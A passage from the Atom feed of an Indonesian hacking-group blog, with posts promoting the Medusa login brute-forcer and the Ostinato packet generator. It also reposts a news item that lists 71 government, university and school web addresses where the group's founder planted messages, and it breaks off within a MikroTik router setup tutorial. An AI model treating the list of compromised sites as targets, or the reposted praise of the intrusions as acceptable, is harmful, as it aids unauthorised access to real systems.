class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-8325744527096200902?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/HLsSHre3R1rjZ64AhvW5UAOrbaM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/HLsSHre3R1rjZ64AhvW5UAOrbaM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/HLsSHre3R1rjZ64AhvW5UAOrbaM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/HLsSHre3R1rjZ64AhvW5UAOrbaM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/ox80oy_CdMc" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/8325744527096200902?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/8325744527096200902?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/ox80oy_CdMc/blackbuntu.html" title="Blackbuntu" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_p3XIipv981Y/TRoJnmu5wzI/AAAAAAAAA1Q/TzZuR8iRjrg/s72-c/grub_2.png" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/blackbuntu.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUAMQnoycSp7ImA9Wx9XEEs.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-917652925661925307</id><published>2011-01-03T20:10:00.001+07:00</published><updated>2011-01-03T21:09:43.499+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-03T21:09:43.499+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><title>Medusa</title><content type="html">&lt;div class="post-header"&gt;  &lt;/div&gt;  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_p3XIipv981Y/TPgxtQ6V6fI/AAAAAAAAAz4/NsyPGVQkH_w/s1600/medusae.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img src="http://4.bp.blogspot.com/_p3XIipv981Y/TPgxtQ6V6fI/AAAAAAAAAz4/NsyPGVQkH_w/s200/medusae.jpg" border="0" width="141" height="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Medusa Parallel Network Login Auditor&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Medusa  is intended to be a speedy, massively parallel, modular, login  brute-forcer. The goal is to support as many services which allow remote  authentication as possible. The author considers following items as  some of the key features of this application: &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Flexible  user input. Target information (host/user/password) can be specified in  a variety of ways. For example, each item can be either a single entry  or a file containing multiple entries. Additionally, a combination file  format allows the user to refine their target listing. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Modular  design. Each service module exists as an independent .mod file. This  means that no modifications are necessary to the core application in  order to extend the supported list of services for brute-forcing.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://80191373.linkbucks.com"&gt;Source &amp;amp; Download&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-917652925661925307?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Im-5tdw3lae6D-MFPUydBGxmzlw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Im-5tdw3lae6D-MFPUydBGxmzlw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Im-5tdw3lae6D-MFPUydBGxmzlw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Im-5tdw3lae6D-MFPUydBGxmzlw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/uBa99bhIZDs" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/917652925661925307?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/917652925661925307?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/uBa99bhIZDs/medusa.html" title="Medusa" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_p3XIipv981Y/TPgxtQ6V6fI/AAAAAAAAAz4/NsyPGVQkH_w/s72-c/medusae.jpg" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/medusa.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkEARH88eyp7ImA9Wx9XEEo.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-1347516686945415118</id><published>2011-01-03T12:17:00.000+07:00</published><updated>2011-01-04T00:10:45.173+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-04T00:10:45.173+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><title>Ostinato</title><content type="html">&lt;div class="post-header"&gt;  &lt;/div&gt;  &lt;div face="'Droid Sans','Albany AMT','lucida grande',tahoma,helvetica,arial,sans-serif" size="13px" style="line-height: 16px; text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_p3XIipv981Y/TNcYCuEDauI/AAAAAAAAAyk/iPt7-qnBkEI/s1600/390634588_330f74c9a8.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img src="http://4.bp.blogspot.com/_p3XIipv981Y/TNcYCuEDauI/AAAAAAAAAyk/iPt7-qnBkEI/s200/390634588_330f74c9a8.jpg" border="0" width="200" height="150" /&gt;&lt;/a&gt;&lt;/div&gt;    Ostinato Live converts any PC to a dedicated network packet traffic  generator. It runs the open source cross platform packet traffic  generator – Ostinato. &lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: 'Droid Sans','Albany AMT','lucida grande',tahoma,helvetica,arial,sans-serif; font-size: 13px; line-height: 16px; text-align: justify;"&gt;   Ostinato is a network packet and traffic generator and analyzer with a friendly &lt;span class="caps"&gt;GUI&lt;/span&gt;.  It aims to be “Wireshark in Reverse” and thus become complementary to  Wireshark. It features custom packet crafting with editing of any field  for several protocols: Ethernet, 802.3, &lt;span class="caps"&gt;LLC&lt;/span&gt; &lt;span class="caps"&gt;SNAP&lt;/span&gt;, &lt;span class="caps"&gt;VLAN&lt;/span&gt; (with Q-in-Q), &lt;span class="caps"&gt;ARP&lt;/span&gt;, IPv4, IPv6, IP-in-IP a.k.a IP Tunneling, &lt;span class="caps"&gt;TCP&lt;/span&gt;, &lt;span class="caps"&gt;UDP&lt;/span&gt;, &lt;span class="caps"&gt;ICMP&lt;/span&gt;,&lt;span class="caps"&gt;HTTP&lt;/span&gt;, &lt;span class="caps"&gt;SIP&lt;/span&gt;, &lt;span class="caps"&gt;RTSP&lt;/span&gt;, &lt;span class="caps"&gt;NNTP&lt;/span&gt;, etc. It is useful for both functional and performance testing.&lt;/div&gt;&lt;div style="font-family: 'Droid Sans','Albany AMT','lucida grande',tahoma,helvetica,arial,sans-serif; font-size: 13px; line-height: 16px; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: 'Droid Sans','Albany AMT','lucida grande',tahoma,helvetica,arial,sans-serif; font-size: 13px; line-height: 16px; text-align: justify;"&gt;&lt;a href="http://f4049855.linkbucks.com/"&gt;Download&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1347516686945415118?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ETeLRXrXIVpFER7yDLZnZL-P6u0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ETeLRXrXIVpFER7yDLZnZL-P6u0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ETeLRXrXIVpFER7yDLZnZL-P6u0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ETeLRXrXIVpFER7yDLZnZL-P6u0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/iU-UnSLTpeM" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1347516686945415118?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1347516686945415118?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/iU-UnSLTpeM/ostinato.html" title="Ostinato" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_p3XIipv981Y/TNcYCuEDauI/AAAAAAAAAyk/iPt7-qnBkEI/s72-c/390634588_330f74c9a8.jpg" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/ostinato.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0cMQHw5eyp7ImA9Wx9VEkQ.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-8785832364894345389</id><published>2011-01-02T17:56:00.000+07:00</published><updated>2011-01-29T18:04:41.223+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-29T18:04:41.223+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Kill-9 News" /><title>71 Website Indonesia dikerjai 'Hacker'</title><content type="html">&lt;div style="text-align: center;"&gt;&lt;img style="width: 446px; height: 229px;" src="http://d.yimg.com/hb/ng/co/kmps/20100816/09/1747197419-71-situs-indonesia-dikerjai-hacker.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;KOMPAS.com - Menjelang  peringatan kemerdekaan ke-65 Republik Indonesia, hacker atau peretas  dari Indonesia justru bikin ulah di puluhan situs yang mayoritas milik  lembaga resmi di Indonesia. Mereka meninggalkan pesan begini,  "DIRGAHAYU INDONESIA TANAH AIR PUSAKA JAYALAH BANGSAKU, JAYALAH  NEGERIKU..MERDEKA!!"&lt;br /&gt;&lt;br /&gt;Aksi itu dimotori peretas yang menyebut diri  Aria Killnine a.k.a &lt;a href="http://kill-9.tk"&gt;arianom&lt;/a&gt;, pendiri komunitas &lt;em&gt;KiLL-9 CrEw &lt;/em&gt;dengan  situsnya di &lt;a href="http://kill-9.tk"&gt;&lt;em&gt;Www.KiLL-9.Tk&lt;/em&gt;&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Daftar situs yang  diretas terlihat di bawah nanti. Tetapi, mengapa pula justru menyerang  situs milik anak bangsa sendiri?&lt;br /&gt;&lt;em&gt;&lt;a href="http://teknologi.kompasiana.com/"&gt;Kompasianer&lt;/a&gt; &lt;/em&gt;Rakhjib  Martapianur memberitahu, "Mereka tidak melakukan perusakan terhadap  site-site tersebut. Mereka hanya menitipkan file, sekaligus mengingatkan  para admin site tersebut bahwa site yang mereka kelola rentan terhadap  serangan oleh hacker-hacker luar Indonesia."&lt;br /&gt;&lt;br /&gt;Rakhjib Martapianur  mengakui, informasi itu diketahuinya dari temannya yang bergelut di  dunia &lt;em&gt;hacking&lt;/em&gt;. Dan, inilah daftar situs yang dititipi  pesan-pesan dari peretas itu:&lt;br /&gt;&lt;br /&gt;1.     http://semestaberjaya.com/indonesiaku.php&lt;br /&gt;2.     http://fs.uns.ac.id/indonesia.php&lt;br /&gt;3.     http://unj.ac.id/indonesia.php&lt;br /&gt;4.     http://www.unand.ac.id/foto/indonesia.htm&lt;br /&gt;5.     http://el82itb.org/indonesia.htm&lt;br /&gt;6.     http://unhalu.ac.id/staff/indonesia.htm&lt;br /&gt;7.     http://www.adhiguna.ac.id/indonesia.htm&lt;br /&gt;8.     http://www.stikes-insan-seagung.ac.id/indonesia.htm&lt;br /&gt;9.     http://www.himsya.ac.id/indonesia.htm&lt;br /&gt;10.     http://www.poltekpos.ac.id/indonesia.htm&lt;br /&gt;11.     http://informatika.uin-malang.ac.id/COPYRIGHT.php&lt;br /&gt;12.     http://www.mar-eng.its.ac.id/ina/akademik/admin/foto_berita/indonesia.htm&lt;br /&gt;13.     http://kaltimprov.go.id/indonesia.php&lt;br /&gt;14.     http://pengadilan.net/indonesia.php&lt;br /&gt;15.     http://bkp.deptan.go.id/indonesia.htm&lt;br /&gt;16.     http://kemenegpora.go.id/merdeka.html&lt;br /&gt;17.     http://sifa.kemenegpora.go.id/merdeka.html&lt;br /&gt;18.     http://www.lsf.go.id/merdeka.html&lt;br /&gt;19.     http://pekalongankota.go.id/merdeka.html&lt;br /&gt;20.     http://bpphp1.dephut.go.id/merdeka.html&lt;br /&gt;21.     http://bpphp2.dephut.go.id/merdeka.html&lt;br /&gt;22.     http://bpphp3.dephut.go.id/merdeka.html&lt;br /&gt;23.     http://bpphp4.dephut.go.id/merdeka.html&lt;br /&gt;24.     http://bpphp5.dephut.go.id/merdeka.html&lt;br /&gt;25.     http://bpphp6.dephut.go.id/merdeka.html&lt;br /&gt;26.     http://bpphp8.dephut.go.id/merdeka.html&lt;br /&gt;27.     http://bpphp9.dephut.go.id/merdeka.html&lt;br /&gt;28.     http://bpphp10.dephut.go.id/merdeka.html&lt;br /&gt;29.     http://manmajenang.sch.id/files/indonesia.php&lt;br /&gt;30.     http://spma-samarinda.sch.id/indonesia.htm&lt;br /&gt;31.     http://smkn1kalasan.sch.id/merdeka.html&lt;br /&gt;32.     http://smkn1madiun.sch.id/merdeka.html&lt;br /&gt;33.     http://robbirodliyya.sch.id/merdeka.html&lt;br /&gt;34.     http://smkypesampang.sch.id/merdeka.html&lt;br /&gt;35.     http://www.smpn3kpj.sch.id/merdeka.html&lt;br /&gt;36.     http://www.majesa.sch.id/merdeka.html&lt;br /&gt;37.     http://smkypkpwk.sch.id/merdeka.html&lt;br /&gt;38.     http://smpn5cirebon.sch.id/merdeka.html&lt;br /&gt;39.     http://smpn2balen.sch.id/merdeka.html&lt;br /&gt;40.     http://smpn1oku.sch.id/merdeka.html&lt;br /&gt;41.     http://smkn6palembang.sch.id/merdeka.html&lt;br /&gt;42.     http://smpn4gm.sch.id/merdeka.html&lt;br /&gt;43.     http://smpn5lht.sch.id/merdeka.html&lt;br /&gt;44.     http://manhokut.sch.id/merdeka.html&lt;br /&gt;45.     http://mtsdarussalampkp.sch.id/merdeka.html&lt;br /&gt;46.     http://smkn1barru.sch.id/merdeka.html&lt;br /&gt;47.     http://sman3bantul.sch.id/merdeka.html&lt;br /&gt;48.     http://sman1cepu.sch.id/merdeka.html&lt;br /&gt;49.     http://smpn1piyungan-btl.sch.id/merdeka.html&lt;br /&gt;50.     http://www.smansa-mjl.sch.id/merdeka.html&lt;br /&gt;51.     http://smp1pra-bws.sch.id/merdeka.html&lt;br /&gt;52.     http://smpn13bdg.sch.id/merdeka.html&lt;br /&gt;53.     http://smpn1panumbangan.sch.id/merdeka.html&lt;br /&gt;54.     http://smpmuh-ckn.sch.id/merdeka.html&lt;br /&gt;55.     http://smkkpbe-bdg.sch.id/merdeka.html&lt;br /&gt;56.     http://sditalamysubang.sch.id/merdeka.html&lt;br /&gt;57.     http://sdnbjs2bdg.sch.id/merdeka.html&lt;br /&gt;58.     http://www.smaplusbanyuasin.sch.id/merdeka.html&lt;br /&gt;59.     http://www.smkn1samarinda.com/merdeka.html&lt;br /&gt;60.     http://akademik.sma-alirsyad-clp.sch.id/merdeka.html&lt;br /&gt;61.     http://sma-alirsyad-clp.sch.id/merdeka.html&lt;br /&gt;62.     http://www.majesa.sch.id/merdeka.html&lt;br /&gt;63.     http://www.bellarminus-bks.sch.id/merdeka.html&lt;br /&gt;64.     http://sman2-wng.sch.id/merdeka.html&lt;br /&gt;65.     http://www.sma1pekalongan.sch.id/merdeka.html&lt;br /&gt;66.     http://kimomibutik.com/admin/foto_berita/indonesia.htm&lt;br /&gt;67.     http://www.smart-v-indonesia.com/indonesia.php&lt;br /&gt;68.     http://kabar-kini.com/indonesia.htm&lt;br /&gt;69.     http://semestaberjaya.com/indonesia.php&lt;br /&gt;70.     http://tikjo.my-php.net/indonesia.php&lt;br /&gt;71.     http://www.pusatk3hiperkes.com/indonesia.htm&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-8785832364894345389?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/mXLHEdXszA90F-whqF766-MMObo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/mXLHEdXszA90F-whqF766-MMObo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/mXLHEdXszA90F-whqF766-MMObo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/mXLHEdXszA90F-whqF766-MMObo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/jUKhWatRokY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/8785832364894345389?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/8785832364894345389?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/jUKhWatRokY/71-website-indonesia-dikerjai-hacker.html" title="71 Website Indonesia dikerjai 'Hacker'" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/71-website-indonesia-dikerjai-hacker.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUMDRHs_fyp7ImA9Wx9WEks.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-4543030705676337932</id><published>2011-01-01T19:25:00.000+07:00</published><updated>2011-01-17T19:31:15.547+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-17T19:31:15.547+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" /><title>Install Mikrotik Sebagai Gateway</title><content type="html">&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable  {mso-style-name:"Table Normal";  mso-tstyle-rowband-size:0;  mso-tstyle-colband-size:0;  mso-style-noshow:yes;  mso-style-parent:"";  mso-padding-alt:0cm 5.4pt 0cm 5.4pt;  mso-para-margin:0cm;  mso-para-margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:10.0pt;  font-family:"Times New Roman";  mso-ansi-language:#0400;  mso-fareast-language:#0400;  mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan sederhana sebagai gateway server.&lt;br /&gt;&lt;br /&gt;1. Langkah pertama adalah install Mikrotik RouterOS pada PC&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;2. Login Pada Mikrotik Routers melalui console :&lt;br /&gt;MikroTik v2.9.7&lt;br /&gt;Login: admin &lt;enter&gt;&lt;br /&gt;Password: (kosongkan) &lt;enter&gt;&lt;br /&gt;&lt;br /&gt;Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin&lt;br /&gt;dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.&lt;br /&gt;&lt;br /&gt;3. Untuk keamanan ganti password default&lt;br /&gt;[admin@Mikrotik] &gt; password&lt;br /&gt;old password: *****&lt;br /&gt;new password: *****&lt;br /&gt;retype new password: *****&lt;br /&gt;[admin@ Mikrotik]] &gt;&lt;br /&gt;&lt;br /&gt;4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi “killnine” (nama ini  bebas terserah kalau mau diganti)&lt;br /&gt;[admin@Mikrotik] &gt; system identity set name=killnine&lt;br /&gt;[admin@killnine] &gt;&lt;br /&gt;&lt;br /&gt;5. Melihat interface pada Mikrotik Router&lt;br /&gt;[admin@killnine] &gt; interface print&lt;br /&gt;Flags: X – disabled, D – dynamic, R – running&lt;br /&gt;# NAME TYPE RX-RATE TX-RATE MTU&lt;br /&gt;0 R ether1 ether 0 0 1500&lt;br /&gt;1 R ether2 ether 0 0 1500&lt;br /&gt;[admin@killnine] &gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;6. Memberikan IP address pada interface Mikrotik. Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 192.168.0.254&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; ip address add address=192.168.0.1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;netmask=255.255.255.0 interface=ether1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; ip address add address=192.168.0.254&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;netmask=255.255.255.0 interface=ether2&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;7. Melihat konfigurasi IP address yang sudah kita berikan&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt;ip address print&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Flags: X – disabled, I – invalid, D – dynamic&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;# ADDRESS NETWORK BROADCAST INTERFACE&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;1 192.168.0.254/24 192.168.0.0 192.168.0.255 ether2&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.1.1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; /ip route add gateway=192.168.1.1&lt;/span&gt;&lt;/enter&gt;&lt;/enter&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;9. Melihat Tabel routing pada Mikrotik Routers&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; ip route print&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Flags: X – disabled, A – active, D – dynamic,&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;C – connect, S – static, r – rip, b – bgp, o – ospf&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;# DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;0 ADC 192.168.0.0/24 192.168.0.254 ether2&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;1 ADC 192.168.0.0/24 192.168.0.1 ether1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;2 A S 0.0.0.0/0 r 192.168.1.1 ether1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; ping 192.168.1.1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;192.168.1.1 64 byte ping: ttl=64 time&lt;1&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;192.168.1.1 64 byte ping: ttl=64 time&lt;1&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;2 packets transmitted, 2 packets received, 0% packet loss&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;round-trip min/avg/max = 0/0.0/0 ms&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;11. Setup DNS pada Mikrotik Routers&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; ip dns set primary-dns=202.134.0.155 allow-remoterequests=no&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; ip dns set secondary-dns=202.134.1.10 allow-remoterequests=no&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;12. Melihat konfigurasi DNS&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; ip dns print&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;primary-dns: 202.134.0.155&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;secondary-dns: 202.134.1.10&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;allow-remote-requests: no&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;cache-size: 2048KiB&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;cache-max-ttl: 1w&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;cache-used: 16KiB&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;13. Tes untuk akses domain, misalnya dengan ping nama domain&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt; ping yahoo.com&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;216.109.112.135 64 byte ping: ttl=48 time=250 ms&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;10 packets transmitted, 10 packets received, 0% packet loss&lt;/span&gt;&lt;br 